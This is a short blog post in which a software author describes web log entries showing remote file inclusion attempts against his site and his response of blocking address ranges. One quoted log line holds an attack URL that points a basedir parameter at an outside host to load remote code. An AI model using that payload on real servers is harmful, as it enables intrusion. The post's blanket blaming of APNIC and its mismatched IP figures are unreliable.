So I started up logging on this site the other day, mostly out of curiosity. I was completely disheartened as soon as I did though. Come to find out some of the most common hits on the site are by people looking to exploit a basedir file inclusion vulnerability. What's worse, this is a vulnerability that exists in some of the software I've written and released open source. In any case, these assholes are basically trying to break into my server by exploiting this vulnerability.
What pisses me off most about this is that I'm the freakin' author of the software that was vulnerable - and I'm the one who wrote the patch. Who are these people? They're blindly trying the exploit against other software that doesn't even have the same code base. For instance:
Type page not found Date Thursday, July 19, 2007 - 10:00 User Anonymous Location http://justin.madirish.net/?q=taxonomy/addressbook.php?GLOBALS[basedir]=http://nxlf.cn/1?? Referrer Message taxonomy/addressbook.php?GLOBALS[basedir]=http://nxlf.cn/1?? Severity warning Hostname 188.8.131.52
Who is 184.108.40.206? Well, lets do some checking and find out. ARIN reports that this is someone in APNIC. I fucking hate people on APNIC. They're responsible for like 90% of the spam I get and now they're trying to hack my servers. Well guess what assholes? I'm dropping the entire APNIC range ( 220.127.116.11 - 18.104.22.168) into a blacklist so my server doesn't respond to your requests.
This might be a little overkill in terms of response, but frankly the information on my site is totally free. I don't get anything out of sharing it, and this sort of crap makes me want to yank the whole thing. Anywhoo, for now I'm dropping a couple extra lines into httpd.conf
Deny from 163.23